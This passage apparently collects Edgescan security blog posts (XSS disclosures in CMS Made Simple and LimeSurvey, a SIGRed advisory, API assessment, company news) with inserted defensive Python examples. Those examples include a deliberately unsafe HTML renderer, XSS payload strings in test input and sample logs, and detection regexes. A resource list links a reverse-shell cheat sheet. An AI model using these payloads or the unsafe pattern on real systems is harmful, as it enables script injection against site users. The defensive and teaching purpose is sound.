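    print("hardened verdict on upload.php:", hard.check("upload.php", b"<?php echo 1;"))
    print("hardened verdict on photo.jpg:", hard.check("photo.jpg", b"\xff\xd8\xff"))
    print("still to disable:", undisabled_functions(SAMPLE_PHP_INI))
```

The deny list is the part that matters: both policies are given the same allow list with "php" added, and only the hardened one refuses the upload. Content sniffing is a secondary check, since a file named photo.jpg that is really PHP is harmless unless the server can be made to execute it, which the extension rule and a server-chosen name already prevent.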
“A Remote Code Evaluation can lead to a full compromise of the vulnerable web application and also the web server. Nearly 2% of vulnerabilities across the fullstack were attributed to RCE in the Edgescan 2020 Vulnerability Stats Report. At Edgescan, we’re proud of the part we play in identifying vulnerabilities in web apps, alerting vendors and supporting them in making their products as secure as possible.” Eoin Keary, CEO, Edgescan.

Subscribe to the Edgescan blog to receive updates.

Guram Javakhishvili, Senior Information Security Consultant, Edgescan

### Edgescan Researcher Discovers Multiple Vulnerabilities in CMS Made Simple and Lime Survey

Edgescan Senior Security Consultant Guram Javakhishvili is making an impact in the cybersecurity field as a researcher (aka hacker), discovering vulnerabilities across a number of popular applications. Some of these are not yet publicly available; as soon as the vendor implements the fix, those issues will also be added to this list and the blog post will be updated accordingly.

This blog post will address vulnerabilities found in CMS Made Simple and Lime Survey which have already been made public. These vulnerabilities were discovered while validating alerts as part of Edgescan’s human intelligence verification. These discoveries are shared with clients so they can evaluate and mitigate the risks. The vendor is also notified so they can resolve the issues and improve the overall security of the application.

CMS Made Simple 2.2.13

CMS Made Simple is a Content Management System that was first released in July 2004 as an open source General Public License (GPL) package. It is currently used in both commercial and personal projects. It’s built using PHP and the Smarty Engine, which keeps content, functionality, and templates separated. Guram discovered 5 vulnerabilities in CMS Made Simple 2.2.13. Three are resolved in the latest update, 2.2.14, and 2 are outstanding.

1. Reflected Cross-Site Scripting #12224 - CMS Made Simple 2.2.13
Issue: Insufficient validation of user input on the authenticated part of the CMS Made Simple web application exposes the application to a reflected cross site scripting (XSS) vulnerability. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.
Vulnerable parameter: m1_newdirname
Severity: Minor
Resolution: Fixed in 2.2.14
Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12224

2. Reflected Cross-Site Scripting #12225 - CMS Made Simple 2.2.13
Issue: Insufficient validation of user input on the authenticated part of the CMS Made Simple web application exposes the application to a reflected cross site scripting (XSS) vulnerability. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.
Vulnerable parameter: m1_name
Severity: Minor
Resolution: Fixed in 2.2.14
Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12225

3. Stored Cross-Site Scripting #12226 - CMS Made Simple 2.2.13
Issue: Insufficient validation of user input on the authenticated part of the CMS Made Simple web application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. When the content is viewed, e.g. by an administrative user, the JavaScript code will be executed in the browser.
Vulnerable parameters: metadata, pagedata
Severity: Critical
Resolution: Fixed in 2.2.14
Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12226

4. Stored Cross-Site Scripting #12227 - CMS Made Simple 2.2.13
Issue: These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. When the User/User's Preferences page is viewed, e.g. by an administrative user, the JavaScript code will be executed in the browser.
Vulnerable parameter: date_format_string
Severity: Minor
Resolution: Fixed in 2.2.14
Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12227

5. Stored Cross-Site Scripting #12228 - CMS Made Simple 2.2.13
Issue: These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server. When the News is viewed, e.g. by an administrative user, the JavaScript code will be executed in the browser.
Vulnerable parameter: m1_title
Severity: Critical
Resolution: Fixed in 2.2.14
Detailed description of this bug: http://dev.cmsmadesimple.org/bug/view/12228

LimeSurvey 3.21.1

LimeSurvey is a free and open source on-line statistical survey web app written in PHP. As web server-based software, it enables users to develop and publish on-line surveys, collect responses, create statistics, and export the resulting data to other applications through a web interface. Guram discovered three vulnerabilities in LimeSurvey 3.21.1 which have been fixed in the latest version, 3.21.2.

1. Cross Site Scripting Stored #15680 - LimeSurvey 3.21.1
Issue: LimeSurvey latest version 3.21.1 and LimeSurvey development version 4.0.0 suffer from reflective and persistent (stored) cross site scripting and HTML injection vulnerabilities. Insufficient validation of user input on the authenticated part of the LimeSurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.
Vulnerable parameters: firstname, lastname
Resolution: Fixed in 3.21.2
Detailed description of this bug: https://bugs.limesurvey.org/view.php?id=15680

2. Cross Site Scripting Stored #15681 - LimeSurvey 3.21.1
Issue: Insufficient validation of user input on the authenticated part of the LimeSurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.
Vulnerable parameter: Quota%5Bname%5D
Resolution: Fixed in 3.21.2
Detailed description of this bug: https://bugs.limesurvey.org/view.php?id=15681

3. Cross Site Scripting #15672 - LimeSurvey 3.21.1
Issue: Insufficient validation of user input on the authenticated part of the LimeSurvey application exposes the application to persistent cross site scripting (XSS) vulnerabilities. These vulnerabilities enable potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.
Vulnerable parameter: ParticipantAttributeNamesDropdown
Resolution: Fixed in 3.21.2
Detailed description of this bug: https://bugs.limesurvey.org/view.php?id=15672

Steps you should take to secure your CMS applications from hacking

It is crucially important to keep your installed scripts and CMS platforms up to date:

- Create a regular schedule to update or patch your CMS, and all installed plugins and themes. Ensure all components are up-to-date. At a minimum, a weekly update is equally important.
- Regularly back up the CMS and its underlying database.
- Subscribe to a regularly-updated list of vulnerabilities for the specific CMS being used.
- Avoid use of default usernames (e.g., ‘admin’) and enforce a strong password policy for your CMS’s admin area and server to protect them from brute force attacks.
- Use a plugin for strong authentication, or two-factor authentication (2FA), for an additional layer of protection.
- Use another layer of protection, a Web Application Firewall (WAF), which automatically protects against all or most of the vulnerabilities. Install security plugins to actively prevent hacking attempts. A WAF applies a set of rules to an HTTP conversation; generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. These plugins notify you of the weaknesses inherent in each platform and halt the hacking attempts that could threaten your application. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application.

More training and resources are available from the Edgescan blog post ‘Secure Application Development Training Material’.

“Cross Site Scripting (XSS) was discovered in 1999 and is massively prevalent across web applications today. Cross site scripting flaws are the most prevalent flaw in web applications today. Over 12% of vulnerabilities across the fullstack were attributed to XSS in the Edgescan 2020 Vulnerability Stats Report. At Edgescan, we’re proud of the part we play in identifying vulnerabilities in web apps, alerting vendors and supporting them in making their products as secure as possible.” Eoin Keary, CEO, Edgescan.

Subscribe to the Edgescan blog to receive updates.

Guram Javakhishvili, Senior Information Security Consultant, Edgescan
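The two sides of the stored XSS pattern reported above, as an added example that is not CMS Made Simple or LimeSurvey code: a row renderer that concatenates stored profile fields into HTML the way the vulnerable code paths did, beside one that encodes each value for the context it lands in (HTML body, quoted attribute, and a URL in href, where HTML encoding alone does not stop a javascript: scheme). It also carries one WAF-style rule of the kind the last bullet describes, run over constructed access-log lines whose parameter names are taken from the advisories. The function names, the regular expressions and the log lines are this example's own assumptions.

```python
"""Stored XSS: concatenated rendering beside contextual output encoding, plus a
WAF-style rule over request logs.

Added example, not CMS Made Simple or LimeSurvey code. The advisories report
profile fields (firstname, lastname, m1_name, Quota[name], ...) being echoed
into HTML unencoded. render_row_unsafe() does what the vulnerable code paths
did; render_row_safe() encodes for the HTML body and attribute contexts and
refuses non-http(s) schemes in href. detect_xss_in_log() applies one rule of
the kind a WAF uses to constructed access-log lines. All names and sample
data are this example's own.
"""
from __future__ import annotations

import html
import re
import urllib.parse

# Raw markup that can execute in a browser: a script tag, an event-handler
# attribute inside a tag, or a javascript: URL in href.
ACTIVE_MARKUP = re.compile(
    r"<\s*script|<[^>]*\bon[a-z]+\s*=|href\s*=\s*[\"']?\s*javascript:", re.IGNORECASE)

# Request-side rule: more aggressive, because a user-supplied name or label has
# no business containing tag syntax, event handlers or script URLs at all.
REQUEST_RULE = re.compile(r"<\s*[a-z/!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def render_row_unsafe(firstname: str, lastname: str, profile_url: str) -> str:
    """Vulnerable pattern: stored values concatenated straight into the template."""
    return (f"<tr><td>{firstname} {lastname}</td>"
            f'<td><a href="{profile_url}">profile</a></td></tr>')


def safe_href(url: str) -> str:
    """URL in an attribute: check the scheme first, then HTML-encode."""
    scheme = urllib.parse.urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_row_safe(firstname: str, lastname: str, profile_url: str) -> str:
    """Same row, each value encoded for the context it lands in."""
    name = html.escape(f"{firstname} {lastname}", quote=True)
    return (f"<tr><td>{name}</td>"
            f'<td><a href="{safe_href(profile_url)}">profile</a></td></tr>')


def contains_active_content(fragment: str) -> bool:
    """True if the rendered fragment carries markup a browser would execute."""
    return bool(ACTIVE_MARKUP.search(fragment))


def detect_xss_in_log(lines: list[str]) -> list[tuple[str, str, str]]:
    """(client, parameter, decoded value) for every query parameter hitting the rule."""
    request = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')
    hits: list[tuple[str, str, str]] = []
    for line in lines:
        m = request.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = urllib.parse.urlsplit(target).query
        for param, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
            if REQUEST_RULE.search(value):
                hits.append((client, param, value))
    return hits


# Constructed access-log lines; parameter names are the ones from the advisories.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2020:10:01:02 +0000] "GET /admin/listusers.php?m1_name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2020:10:01:07 +0000] "GET /admin/adduser.php?m1_name=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2020:10:01:09 +0000] "GET /index.php?Quota%5Bname%5D=%22%20onmouseover%3D%22alert(1) HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    payload = "<script>alert('xss')</script>"
    print(contains_active_content(render_row_unsafe(payload, "Smith", "javascript:alert(1)")))
    print(render_row_safe(payload, "Smith", "javascript:alert(1)"))
    print(detect_xss_in_log(SAMPLE_LOG))
```

The log rule is intentionally the blunt instrument the bullet describes: it catches the obvious payload shapes and nothing else, which is why the output-encoding functions, not the WAF, are the fix. Encoding is context-specific; the href case shows that the same value needs a different treatment in a URL attribute than in element text.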
### Advisory: Critical RCE in Windows DNS - CVE-2020-1350

Windows CVE-2020-1350, aka SIGRed

This blog explains CVE-2020-1350, aka SIGRed: how to identify if you are vulnerable and what, if anything, you need to do.

What is it?

It’s a vulnerability in all versions of Windows Server that could result in Remote Code Execution: by sending a crafted DNS request to the server, a successful attacker can run unwanted operations on the machine, which can irreparably damage affected machines. The vulnerability has been deemed ‘wormable’, which means it can be spread between vulnerable machines without user interaction. It can be spread as easily as getting a user to interact with a webpage. Check Point have given a breakdown of how the vulnerability may be exploited, as well as how to protect against it: https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/

Should I be worried?

Yes, this should be patched and the machines restarted at the earliest opportunity.

What do I need to do?

Edgescan are advising patching at the earliest convenience. When we start seeing SIGRed in the wild on our clients' infrastructure, we will be advising them if they are vulnerable. You should also check your patching for Windows Servers: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

If you can’t immediately apply patches, there is a temporary workaround by editing the maximum length of a DNS message via the registry:
https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability

CVE advisory: https://nvd.nist.gov/vuln/detail/CVE-2020-1350

MS Security Response update: https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/

If you have any concerns please reach out to the Edgescan Team through the usual channels.

### API Detection and Assessment: What They Don't Tell you in Class...

Edgescan CEO/Founder Eoin Keary shares his blog on API Detection and Assessment

APIs (Application Programming Interfaces) are back-end services which expose an interface that can be used to connect to a back-end system and transact with it, or read and write information to and from it. They are extremely useful and a great architecture decision, delivering flexibility and extensibility of a service. APIs deliver functionality once the client service knows how to talk to the API. APIs generally sit behind an HTTP port and, unlike a website, can’t be seen, but they may deliver an equal level of value and functionality to the requesting client.

Many websites may use an API, but the user does not invoke the API directly; rather, the website or app is a proxy for the API. APIs are not built to be human readable, like a website, but rather machine readable.

There are two challenges relating to API security assessment:

API Discovery: Do we have an inventory of all APIs deployed on the public Internet? You may have APIs hosted on systems behind HTTP ports which are undiscovered. They may be well known, but they may also be old or development deployments which are forgotten about. We can’t secure what we don’t know about.

Adequate assessment involves coverage of entire corporate ranges (CIDR ranges), large lists of IPs and domain names (FQDNs), using a multi-layer probing methodology detailed below. API discovery is a combination of both host layer and web layer investigation.
Some are easier to discover than others.

Discovering API artefacts: Discovery of APIs may require multiple layers of probing. If we don’t know how to invoke a given API, identification across many levels is required to accurately provide a confidence interval as to whether an API is present or not.

Detection probes (in Edgescan) include:

API Assessment: Keeping pace with change and development.

Assessment of APIs can be difficult, as the assessment methodology requires knowledge of how to communicate with and invoke the API. Running a simple web scanner against an API simply does not work. A scanner would just hit an initial URL and not know how to invoke or traverse the various API calls.

Good API assessment should have the ability to read/ingest descriptor files in order to understand how to communicate with and invoke the API. Once this is done a scanner can assess the API method calls. As the development team alter and change the API, the assessment technology can read the newly updated descriptor file and assess the API including the new changes: keeping pace with change. Assessment of vulnerabilities specific to APIs is also important. Items discussed in the OWASP API Top 10 are an important aspect of true API-specific testing.

DevOps: In a DevOps environment the descriptor file can be used to determine changes/deltas since the last deployment of the API and assess only the changes, saving valuable time in a fast DevOps environment: iterative testing when frequent change occurs.

For more on Edgescan's API services see:

Eoin Keary, CEO/Founder, Edgescan
http://ekeary.blogspot.com/
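The descriptor-driven assessment and delta idea from the API Assessment and DevOps paragraphs above, as an added example that is not Edgescan's assessment technology: two constructed OpenAPI 3 documents stand in for the previous and current deployments; the code enumerates the operations a scanner could invoke, fingerprints each one so that a changed request body or path parameter is detected while key reordering is not, reduces the next run to the added and changed operations, and lists the operations whose descriptor declares no security requirement, which is where the OWASP API Top 10 authentication checks begin. The function names and both sample descriptors are this example's own assumptions.

```python
"""Descriptor-driven API assessment scoping with change detection.

Added example, not Edgescan's assessment technology. The post says an API
scanner has to ingest a descriptor to learn which operations it can invoke,
and that in a DevOps flow the descriptor delta since the last deployment
tells you what to re-assess. load_operations() walks a constructed OpenAPI 3
document, diff_operations() classifies each operation as added, changed,
removed or unchanged by content fingerprint, assessment_scope() returns what
the next run should cover, and unauthenticated_operations() lists operations
with no security requirement. Names and sample specs are this example's own.
"""
from __future__ import annotations

import hashlib
import json

HTTP_METHODS = ("get", "put", "post", "delete", "options", "head", "patch", "trace")


def load_operations(spec: dict) -> dict[str, dict]:
    """Map 'METHOD /path' -> operation object. Path-level parameters are folded
    into each operation so that a change to them counts as a change to the call."""
    ops: dict[str, dict] = {}
    for path, item in spec.get("paths", {}).items():
        shared = item.get("parameters", [])
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # "parameters", "summary", "$ref" etc. are not operations
            merged = dict(op)
            merged["parameters"] = shared + op.get("parameters", [])
            ops[f"{method.upper()} {path}"] = merged
    return ops


def fingerprint(op: dict) -> str:
    """Canonical JSON, so key reordering in the descriptor is not a 'change'."""
    return hashlib.sha256(json.dumps(op, sort_keys=True).encode()).hexdigest()


def diff_operations(old: dict, new: dict) -> dict[str, list[str]]:
    """Classify every operation present in either descriptor."""
    old_ops, new_ops = load_operations(old), load_operations(new)
    out: dict[str, list[str]] = {"added": [], "changed": [], "removed": [], "unchanged": []}
    for key in sorted(set(old_ops) | set(new_ops)):
        if key not in old_ops:
            out["added"].append(key)
        elif key not in new_ops:
            out["removed"].append(key)
        elif fingerprint(old_ops[key]) != fingerprint(new_ops[key]):
            out["changed"].append(key)
        else:
            out["unchanged"].append(key)
    return out


def assessment_scope(old: dict, new: dict) -> list[str]:
    """Operations the next assessment run must cover: new or altered calls."""
    d = diff_operations(old, new)
    return sorted(d["added"] + d["changed"])


def unauthenticated_operations(spec: dict) -> list[str]:
    """Operations with no security requirement. An explicit empty list on an
    operation overrides the global requirement; that is how OpenAPI marks a
    deliberately public endpoint, and a forgotten one looks exactly the same."""
    global_sec = spec.get("security", [])
    return sorted(k for k, op in load_operations(spec).items()
                  if not op.get("security", global_sec))


# Constructed descriptors: the previous deployment and the current one.
SPEC_V1 = {
    "openapi": "3.0.3",
    "security": [{"bearerAuth": []}],
    "paths": {
        "/users": {
            "get": {"summary": "List users"},
            "post": {"summary": "Create user", "requestBody": {"required": True}},
        },
        "/users/{id}": {
            "parameters": [{"name": "id", "in": "path", "required": True}],
            "get": {"summary": "Get user"},
            "delete": {"summary": "Delete user"},
        },
        "/health": {"get": {"summary": "Health", "security": []}},
    },
}

SPEC_V2 = {
    "openapi": "3.0.3",
    "security": [{"bearerAuth": []}],
    "paths": {
        "/users": {
            "get": {"summary": "List users"},
            "post": {"summary": "Create user",
                     "requestBody": {"required": True,
                                     "content": {"application/json": {"schema": {"type": "object"}}}}},
        },
        "/users/{id}": {
            "parameters": [{"name": "id", "in": "path", "required": True}],
            "get": {"summary": "Get user"},
        },
        # New endpoint shipped with an explicit empty security requirement.
        "/users/{id}/export": {"get": {"summary": "Export user data", "security": []}},
        "/health": {"get": {"summary": "Health", "security": []}},
    },
}

if __name__ == "__main__":
    print(diff_operations(SPEC_V1, SPEC_V2))
    print("to assess:", assessment_scope(SPEC_V1, SPEC_V2))
    print("no auth:", unauthenticated_operations(SPEC_V2))
```

Removed operations are reported but not scoped for testing: they still matter to an inventory, since a call that left the descriptor but is still served is exactly the forgotten deployment the Discovery section warns about. Scoping by descriptor delta also depends on the descriptor being the real deployment artefact; a hand-maintained one that lags behind the code will hide changes rather than surface them.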
### Edgescan Receives €10.5M BGF Investment

Ireland’s largest growth capital investor, BGF, has invested €10.5 million to acquire a minority stake in Edgescan, one of Ireland’s leading cybersecurity businesses. This is the fourth investment which BGF has made in an Irish business in the past 17 months. The combined value of those four investments is over €30 million.

Edgescan was set up in Dublin in 2011 by Eoin Keary and Rahim Jina. Eoin Keary is a former vice-chair of OWASP (the Open Web Application Security Project), a project lead and author. Rahim Jina is a cybersecurity veteran. The company provides continuous cybersecurity intelligence, assessment and services to leading national and international companies. Last week the company was named as the Best Vulnerability Management Solution provider in the prestigious SC Awards Europe 2020. Edgescan clients include some of the world’s largest entertainment, media, financial services, healthcare and retail companies. The company employs 57 people in Dublin.

Speaking today, Eoin Keary said: “Having bootstrapped the company to date, we are delighted to have reached this milestone investment from BGF. We have ambitious plans to aggressively grow Edgescan with a focus on opportunities in North America, the UK and Europe. We look forward to working closely with Bernie and BGF to fulfil our goals for the business in the coming years.”

Former senior IBM executive Bernie Waldron has joined the Board of Edgescan as independent Non-Executive Chairman. Mr. Waldron is also investing in the business alongside BGF. He brings a wealth of experience in scaling high-growth technology businesses internationally.

Bernie Waldron said: “I’ve been hugely impressed by the differentiated position Edgescan have already carved out in the fast-growing cybersecurity marketplace, with significant overseas business and global blue-chip clients and partners.
Eoin and Rahim have also shown themselves to be ambitious and open-minded in their approach to continuing their growth, and I'm looking forward to working closely with them."

Leo Casey, who heads BGF's operations in Ireland, will also join the Board, with Maedhbh O'Driscoll of BGF joining as a Board observer.

Leo Casey, Head of BGF in Ireland, said: "This is our fourth investment in an Irish business in the past 18 months and the sectors we have invested in range from healthcare to construction to aerospace and now software. Despite the upheaval caused by Covid 19 we remain very confident about the Irish market and we are looking forward to investing in more ambitious Irish companies over the course of this year."

Edgescan's proprietary SaaS product continuously detects vulnerabilities across a company's networks, web applications, APIs and cloud deployments. The company has enjoyed rapid growth in recent years (software revenues have grown at a compound annual rate of 40% since 2016), reflecting the business-critical nature of the solutions the company provides. The BGF investment will be used for a number of purposes, including to accelerate Edgescan's international expansion and to expedite new product development to continue the company's strong growth trajectory.

Pictured (l-r) are Eoin Keary and Rahim Jina from Edgescan with Maedbh O'Driscoll and Leo Casey from BGF. Photograph: Fennell Photography.

Dublin, 7/06/2020

### Edgescan's Emma Heffernan runner up in SC Awards Europe Cybersecurity Student of the Year

Three for three at the SC Awards Europe for Edgescan, as Edgescan Analyst Emma Heffernan receives runner-up in her category. The SC Awards Europe took place virtually this year on the 2nd, 3rd and 4th of June, to showcase the amazing work and teams from the cybersecurity industry in Europe.

Edgescan was shortlisted for both Best Vulnerability Management Solution AND Best Enterprise Security Solution.
The good news too is that Edgescan Security Analyst Emma Heffernan was shortlisted for Cybersecurity Student of the Year.

Edgescan was announced as winner of Best Vulnerability Management Solution 2020 on Wednesday, and on Thursday Edgescan received the Highly Commended accolade in the Best Enterprise Security Solution category. To finish up on a high, Edgescan Security Analyst Emma Heffernan was named Highly Commended in the Cybersecurity Student of the Year category.

SC Awards Europe 2020

The judges called our highly commended entry a "Very creative entry!", with one judge commenting how she "especially liked the video which made judging her entry more fun," while another noted the entrant was "really going above and beyond to increase her skills and knowledge."

Emma Heffernan is studying for a BSc in Computing in Digital Forensics and Cyber Security at TU Dublin, where she is a student ambassador for the university. She founded the Irish Humans of Cyber Network, an organisation for students and industry professionals or those looking to change their career. Heffernan is a mentor to children in the local CoderDojo, participates in the STEM Aspire Mentoring programme with Dell EMC, showing female students how STEM subjects open opportunities in the tech sector, and is a member of OWASP. She is a regular at Capture the Flag events and has represented Ireland at international competitions including the European Cyber Security Challenge. She also speaks at conferences, including addressing the IRISSCERT Cyber Crime Conference, attended by nearly 400 people.

Emma remarked, "I'd like to thank everyone who has supported me over the last year in building my career, especially the team at Edgescan. Being shortlisted and awarded 'highly commended' at this year's SC Awards Europe was an honour. This is just the beginning, there'll be much more to come!"

Congratulations Emma, you've a bright future ahead.
### SC Awards Europe Best Enterprise Security Solution - Edgescan Highly Commended

The SC Awards Europe took place virtually this year on the 2nd, 3rd and 4th of June, to showcase the amazing work and teams from the cybersecurity industry in Europe.

Edgescan was shortlisted for both Best Vulnerability Management Solution AND Best Enterprise Security Solution. Good news too that Edgescan Security Analyst Emma Heffernan was shortlisted for Cybersecurity Student of the Year.

Edgescan was announced as winner of Best Vulnerability Management Solution 2020 on Wednesday, and on Thursday Edgescan received the Highly Commended accolade in the Best Enterprise Security Solution category.

Edgescan impressed the judging panel. Our judges said, "A great example of a comprehensive vulnerability management system with excellent reporting capabilities," concluding, "Really great submission, good use of images to sell the story."

Edgescan delivers a managed service which detects and helps defend clients from cyber-attacks on a continuous basis. The platform is a highly scalable SaaS solution that offers users a blend of sensible metrics, ease of use and filtering tools within the client's secure web portal, making it easy, even with a large amount of data, to view the most important cyber-risks facing them. The Edgescan dashboard is updated upon the completion of every assessment and is available 24/7.

### Edgescan Wins Best Vulnerability Management Solution at SC Awards Europe

The SC Awards Europe takes place virtually this year on the 2nd, 3rd and 4th of June, to showcase the amazing work and teams from the cybersecurity industry in Europe. Edgescan have been shortlisted for both Best Vulnerability Management Solution AND Best Enterprise Security Solution. Good news too that Edgescan Security Analyst Emma Heffernan has been shortlisted for Cybersecurity Student of the Year.
Edgescan Fullstack Vulnerability Management was described by the judges as a "Good all-rounder," and "A highly scalable SaaS solution with good TCO, collaboration across other tools. A strong solution," concluding it is a "Valuable product that addresses major external threats and adds human context."

Edgescan CEO Eoin Keary accepted the award for Edgescan and sent in his acceptance speech: "Delighted to be honoured with such an award as recognition of our service, platform, clients and people." Eoin Keary, CEO, Edgescan.

SC Awards Europe 2020 - Day 3

Day 3 of the SC Awards Europe 2020 shows on Thursday 4th June. Edgescan is up for Best Enterprise Security Solution and Edgescan Security Analyst Emma Heffernan is up for Cybersecurity Student of the Year. Fingers crossed!

UPDATE! Edgescan received a Highly Commended nod for both Best Enterprise Security Solution and for Emma as Cybersecurity Student of the Year!

### Technical data sheet Edgescan

### Webinar - Edgescan Workshop with TUDublin

Edgescan TUDublin Webinar, 27th April 2020

Student webinar including presentations from Edgescan experts:

- Ciaran - Working in Edgescan (00:00)
- Dearbhail - 2020 Edgescan Stats Report Insights (00:22)
- Conor - HTB Demo (00:41)

Resources:

- https://gtfobins.github.io/
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://www.exploit-db.com/exploits/47837
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://portswigger.net/web-security - Burp Academy for web testing
- https://owasp.org/www-project-juice-shop/ for testing and learning; generally any of the OWASP resources.
- https://www.ecollege.ie - Free resources

Edgescan Careers & Internships

Any questions about this webinar, contact jan@edgescan.com

Keep up to date with future presentations on the Edgescan Events & Webinars page.
### PFH Announced as an Edgescan Partner

PFH Technology Group and Edgescan have united to create a partnership to further strengthen their ICT Solutions and Security portfolio. The constant and real threat of cyber-attacks warrants customers to ensure that the best is being done to secure their data and business at all times. This means ensuring that your data is secure, available and has full integrity with no margin for error 24x7x365.

PFH are renowned for delivering best-in-class, customer-centric ICT solutions and managed services for over 30 years, with over 450 staff and 1500 customers nationwide. Covering everything from desktop to datacentre and cloud, PFH are industry leaders in supplying full end-to-end solutions which are built with security by design.

Full stack vulnerability services require specialised security skillsets, regular iterations and, more importantly, a service that can react accordingly by planning and implementing fixes. As such, PFH have chosen the global and award-winning vulnerability leaders Edgescan, who have local expertise to work alongside PFH Technology Group's Network Operations Centre and solution design teams. This partnership adds another layer of security to PFH's Managed Services portfolio and further strengthens PFH's position as the number one privately-owned ICT company in the marketplace. This gives our customers peace of mind when it comes to detecting security weaknesses which may result in a breach, reputation damage or loss of revenue.

Gerard Kirrane, Cyber Security Solutions Lead at PFH, explains how this has proven to be an attractive and relevant service in the Irish marketplace: "It is no longer a time where companies can stick their head in the sand about the real threats that occur today. Everyone is a target. As ICT is becoming more advanced and in some ways more complex, our clients are looking for a fewer number of partners and vendors to deal with in order to try and reduce complexity and costs.
Having Edgescan as part of our managed services portfolio allows us to build in security services by design that are delivered with a best of breed approach, while maintaining clear separation of duties and allowing the experts to do what they do best."

Eoin Keary, CEO at Edgescan, stated: "We are excited to be working with PFH in expanding the range of services offered to their national and international clients. We're proud to partner with an Ireland based company and support them in their continued success."

The PFH Technology Group and Edgescan partnership will now allow for:

- Continuous Vulnerability Management, which keeps pace with constant changes to the customers' environment. As new cybersecurity issues are made public, Edgescan helps detect if a customer is vulnerable, resulting in continuous vulnerability intelligence, and PFH are there to assist with understanding the risk and the remediations required around it.
- API Security Testing, which provides continuous security testing for the ever-growing world of APIs. APIs are becoming ever more popular given the explosive growth in mobile apps.
- Penetration Testing Services, which provide both manual consultant-based penetration testing and deep security testing via our Edgescan Advanced License. Edgescan is CREST Accredited as meeting the strict criteria set down for providing an expert Penetration Testing service.

Join us on our webinar on Wednesday 6th May 2020. Gerard Kirrane, Cyber Security Solutions Lead at PFH, and Eoin Keary, CEO at Edgescan, will provide an overview of Edgescan's award-winning technology and how it can further protect organisations.

### Edgescan Shortlisted Twice for SC Awards

Fantastic News - Edgescan a Finalist in the SC Awards Europe 2020 in Two Categories

Edgescan has been shortlisted in the SC Awards Europe 2020 in the categories of Best Vulnerability Management Solution and Best Enterprise Security Solution.
In addition, Edgescan Security Analyst Emma Heffernan has been nominated as Best Cyber Security Student of the Year 2020. Congratulations Emma!

The SC Awards Europe usually take place in London, in the run up to the InfoSecurity Europe Conference in June. Due to Covid-19, these events are going virtual, so instead of one night of partying, the SC Awards will run over a number of days. We can't wait to see what the SC Awards team have planned.

Edgescan is an award-winning solution and we hope to add to the collection at the SC Awards 2020.

### Calm Down - In Defence of Zoom

Edgescan's Senior Security Consultant, Guram Javakhishvili, gives his take on the Zoom debacle. Guram stresses that he is not 'sponsored by Zoom' 😊.

First of all, nothing is bulletproof and anything can be hacked. We all make mistakes and learn from them. That's how and why we improve and update software on a regular basis.

The question is: on what basis are other blog posters or researchers assuming that there's RCE, UNC Path Injection, weak or no E2E encryption and many other vulnerabilities which have been mentioned over the past few weeks? If they have been testing or targeting Zoom systems in its production environment without penetration testing authorisation, then that is illegal and unethical. I believe most of these blog posts are just repeating unethical researchers' unauthorised publications.

A brief clarification on a few of the vulnerabilities recently posted and my personal thoughts on them:

Zoom video recordings accessible to the public

This is a user issue. There is an option within the Zoom admin panel where you can set video recordings to be private, public or only accessible by call participants. If you are not aware of the current settings, better check before recording. If recording is set to 'Public' then anyone with access to the link will be able to see the video content.
By default, users tend to leave 'Public' enabled, and then if they post the link somewhere or even access the link through a shared browser (since the encrypted key of the video recording is contained in the URL) it will stay in the browser history and whoever has access to the machine will be able to access it.

Zoom bombing (attackers can brute force ID and Password)

Even if you had a valid password and ID, you still start a call in a 'waiting room' until the host admits you. You can basically do nothing in the waiting room, and there is no way you can bypass this until the host admits you to the meeting. Also, I'm not too sure about brute-forcing, since Zoom uses Cloudflare WAF protection. This needs a little bit of tuning (I would have thought Zoom allowed multiple failed login attempts without blocking joiners, since participants might get the password or ID wrong), but again this can be enhanced from the admin panel if one is familiar with the settings. Again, user awareness: choose to use complex passwords; you can always set this yourself if you want to be safe.

UNC Path Injection

UNC Path is possible with other modern applications too, not just Zoom. MS Outlook does also allow a UNC Path as a hyperlink. So what? We have never abandoned Outlook for this. Nevertheless, Zoom already addressed this and the latest release does not allow UNC Paths anymore.

Zoom does not support E2E Encryption

